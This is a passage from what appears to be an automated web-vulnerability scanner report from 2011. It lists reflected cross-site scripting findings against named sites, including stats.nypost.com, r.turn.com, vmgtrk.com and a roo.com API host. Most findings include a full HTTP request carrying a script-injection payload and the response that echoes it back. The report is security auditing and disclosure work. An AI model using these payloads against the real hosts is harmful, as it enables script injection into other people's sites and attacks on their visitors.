The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e5957<a>b4dfccdf814 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&e5957<a>b4dfccdf814=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:23 GMT
Content-Length: 5637
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&e5957<a>b4dfccdf814=1/ErrorInfoService.asmx" />
...[SNIP]...

1.98. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 7211b<a>d13bd9d5899 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337997211b<a>d13bd9d5899 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:21 GMT
Content-Length: 5625
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337997211b<a>d13bd9d5899/ErrorInfoService.asmx" />
...[SNIP]...

1.99. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c107a<a>e030cdb19c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&c107a<a>e030cdb19c8=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:54:36 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&c107a<a>e030cdb19c8=1/PlaylistInfoService.asmx" />
...[SNIP]...

1.100. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 805d1<a>9442a9480e1 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799805d1<a>9442a9480e1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:54:34 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799805d1<a>9442a9480e1/PlaylistInfoService.asmx" />
...[SNIP]...

1.101. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6158d<a>fef6ea25a2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&6158d<a>fef6ea25a2d=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:23 GMT
Content-Length: 8814
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&6158d<a>fef6ea25a2d=1/RSSService.asmx" />
...[SNIP]...

1.102. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload ddf95<a>fbeebb8e4ab was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799ddf95<a>fbeebb8e4ab HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:20 GMT
Content-Length: 8802
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799ddf95<a>fbeebb8e4ab/RSSService.asmx" />
...[SNIP]...

1.103. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 41784<a>c99c3d4327e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&41784<a>c99c3d4327e=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:17 GMT
Content-Length: 5534
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&41784<a>c99c3d4327e=1/RatingService.asmx" />
...[SNIP]...

1.104. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 95d07<a>a64db502d4d was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379995d07<a>a64db502d4d HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:16 GMT
Content-Length: 5522
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379995d07<a>a64db502d4d/RatingService.asmx" />
...[SNIP]...

1.105. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6594"><script>alert(1)</script>787c1397da1 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=a6594"><script>alert(1)</script>787c1397da1&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 07-Aug-2011 02:09:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:08:59 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=7475527706804467806&fpid=a6594"><script>alert(1)</script>787c1397da1&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.106. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2604a"><script>alert(1)</script>f2f82733516 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=2604a"><script>alert(1)</script>f2f82733516&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 07-Aug-2011 02:09:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:00 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=3889232801873965617&fpid=4&nu=n&t=&sp=2604a"><script>alert(1)</script>f2f82733516&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.107. http://stats.nypost.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /fb/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ad94"><script>alert(1)</script>e2be14c4e6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb/scoreboard.asp?2ad94"><script>alert(1)</script>e2be14c4e6c=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=10
Date: Tue, 08 Feb 2011 02:34:42 GMT
Content-Length: 29771
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/fb/scoreboard.asp?2ad94"><script>alert(1)</script>e2be14c4e6c=1&amp;meta=true" http-equiv="Refresh">
...[SNIP]...

1.108. http://stats.nypost.com/mlb/scoreboard.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /mlb/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125f5"><script>alert(1)</script>5d9a54190c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mlb/scoreboard.asp?125f5"><script>alert(1)</script>5d9a54190c8=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Tue, 08 Feb 2011 02:34:43 GMT
Content-Length: 29152
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/mlb/scoreboard.asp?125f5"><script>alert(1)</script>5d9a54190c8=1&amp;meta=true" http-equiv="Refresh">
...[SNIP]...

1.109. http://stats.nypost.com/nba/scoreboard.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /nba/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2d26"><script>alert(1)</script>cf0c3971885 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nba/scoreboard.asp?d2d26"><script>alert(1)</script>cf0c3971885=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Tue, 08 Feb 2011 02:34:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/nba/scoreboard.asp?d2d26"><script>alert(1)</script>cf0c3971885=1&meta=true" http-equiv="Refresh">
...[SNIP]...

1.110. http://stats.nypost.com/nhl/scoreboard.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /nhl/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc282"><script>alert(1)</script>a88736d6b0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nhl/scoreboard.asp?bc282"><script>alert(1)</script>a88736d6b0d=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Tue, 08 Feb 2011 02:34:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/nhl/scoreboard.asp?bc282"><script>alert(1)</script>a88736d6b0d=1&meta=true" http-equiv="Refresh">
...[SNIP]...

1.111. http://vmgtrk.com/tracking202/static/landing.php [lpip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vmgtrk.com
Path:   /tracking202/static/landing.php

Issue detail

The value of the lpip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc80'%3balert(1)//b154865b622 was submitted in the lpip parameter. This input was echoed as 7dc80';alert(1)//b154865b622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tracking202/static/landing.php?lpip=72467dc80'%3balert(1)//b154865b622 HTTP/1.1
Host: vmgtrk.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:06:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3176

function t202Init(){
   //this grabs the t202kw, but if they set a forced kw, this will be replaced
   
   if (readCookie('t202forcedkw')) {
       var t202kw = readCookie('t202forcedkw');
   } else {
       var t202kw = t202GetVar('t202kw');
   }

   var lpip = '72467dc80';alert(1)//b154865b622';
   var t202id = t202GetVar('t202id');
   var OVRAW = t202GetVar('OVRAW');
   var OVKEY = t202GetVar('OVKEY');
   var OVMTC = t202GetVar('OVMTC');
   var c1 = t202GetVar('c1');
   var c2 = t202GetVar('c2');
   var
...[SNIP]...

1.112. http://vmgtrk.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vmgtrk.com
Path:   /tracking202/static/landing.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1483e'%3balert(1)//07436e66004 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1483e';alert(1)//07436e66004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tracking202/static/landing.php?lpip=/1483e'%3balert(1)//07436e660047246 HTTP/1.1
Host: vmgtrk.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:06:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3177

function t202Init(){
   //this grabs the t202kw, but if they set a forced kw, this will be replaced
   
   if (readCookie('t202forcedkw')) {
       var t202kw = readCookie('t202forcedkw');
   } else {
       var t202kw = t202GetVar('t202kw');
   }

   var lpip = '/1483e';alert(1)//07436e660047246';
   var t202id = t202GetVar('t202id');
   var OVRAW = t202GetVar('OVRAW');
   var OVKEY = t202GetVar('OVKEY');
   var OVMTC = t202GetVar('OVMTC');
   var c1 = t202GetVar('c1');
   var c2 = t202GetVar('c2');

...[SNIP]...

1.113. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

